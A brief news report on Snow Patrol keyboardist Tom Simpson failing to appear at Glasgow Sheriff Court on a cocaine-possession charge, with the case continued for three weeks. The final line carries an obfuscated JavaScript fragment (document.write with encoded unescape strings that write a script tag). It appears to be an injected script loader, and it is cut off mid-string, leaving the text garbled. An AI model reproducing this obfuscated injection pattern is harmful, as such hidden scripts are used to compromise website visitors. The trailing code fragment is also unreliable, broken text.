Snow Patrol star Tom Simpson did not appear in court to face a charge of cocaine possession.
The case at Glasgow Sheriff Court was continued for three weeks.
Sheriff Iain Peebles continued the case without plea until August 28 after a request from Simpson's lawyer.
Simpson and co-accused Colin Kennedy, both 35 and from Glasgow, are accused of being in possession of cocaine in Sauchiehall Street, Glasgow, on June 24, 2006.
At the last hearing earlier this month, the keyboard player was told that he must appear before the court on July 31.
Sheriff Peebles did not query his absence.
Snow Patrol, whose hits include Run and Chasing Cars, had a number one hit with their 2006 album Eyes Open.
The Glasgow-based band performed at the Live Earth concert at Wembley and this summer's T in the Park music festival.
The band is scheduled to play at the V Festival in Staffordshire next month.document.write(unescape("\074\123CR\111PT%3E\144oc%75\155%65n\04574.w%72\151te\050un\145\163ca\160e(%22
